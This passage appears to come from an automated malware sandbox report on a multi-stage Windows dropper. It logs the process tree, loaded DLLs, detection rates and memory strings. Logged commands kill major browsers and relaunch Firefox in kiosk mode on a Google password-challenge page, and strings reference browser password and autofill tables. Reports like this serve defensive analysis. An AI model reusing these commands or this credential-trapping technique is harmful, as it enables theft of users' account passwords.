Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000003.2092982690.0000000005F42000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078174144.0000000005EB7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2092893035.0000000005E9A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005E99000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2753990962.0000000005B54000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2770091112.0000000005BD3000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754763891.0000000005B38000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873473374.00000000059D6000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2887894842.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059B7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 996773cd54.exe, 0000000A.00000002.2813065067.00000000009EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofills;
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52%
Source: CT1ROX8L8OCI432H.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: R4UI5PZ4W045Z6XA.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: DRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeP
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe "C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe "C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe"
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe "C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe "C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe "C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe"
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe "C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe"
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003096001\num.exe "C:\Users\user\AppData\Local\Temp\1003096001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20230927232528 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35e7d4a5-9554-4d22-b10d-2ccb5f3f4d3d} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" 25e7106d910 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe "C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -parentBuildID 20230927232528 -prefsHandle 4244 -prefMapHandle 3936 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a663a9-61df-4815-9b94-9c34ad594b81} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" 25e835c8e10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe "C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe"
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe "C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe"
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe "C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1003096001\num.exe "C:\Users\user\AppData\Local\Temp\1003096001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe "C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe"
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe "C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2120 -parentBuildID 20230927232528 -prefsHandle 2024 -prefMapHandle 2016 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d420dc28-e6f0-4495-8bd5-85d99979d19a} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" 17424e70310 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe "C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe "C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe "C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe "C:\Users\user\AppData\Local\Temp\1003094001\996773cd54.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe "C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003096001\num.exe "C:\Users\user\AppData\Local\Temp\1003096001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe "C:\Users\user\AppData\Local\Temp\QEDBGN5ZBSJ2P7FMKVJ.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe "C:\Users\user\AppData\Local\Temp\WFFF3RQI4OTCXKCYJD8SM6QSC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe "C:\Users\user\AppData\Local\Temp\NY2MHEYTRUUIBIOHSM78UW53NORWWH.exe"
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Process created: C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe "C:\Users\user\AppData\Local\Temp\Z8CGSNLTKTUPC3EY1G7AG03OLDYT.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2184 -parentBuildID 20230927232528 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35e7d4a5-9554-4d22-b10d-2ccb5f3f4d3d} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" 25e7106d910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -parentBuildID 20230927232528 -prefsHandle 4244 -prefMapHandle 3936 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {70a663a9-61df-4815-9b94-9c34ad594b81} 5428 "\\.\pipe\gecko-crash-server-pipe.5428" 25e835c8e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003095001\036e90e395.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2120 -parentBuildID 20230927232528 -prefsHandle 2024 -prefMapHandle 2016 -prefsLen 25350 -prefMapSize 238051 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d420dc28-e6f0-4495-8bd5-85d99979d19a} 1656 "\\.\pipe\gecko-crash-server-pipe.1656" 17424e70310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CT1ROX8L8OCI432H.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\R4UI5PZ4W045Z6XA.exe Section loaded: bcp47langs.dll Jump to behavior
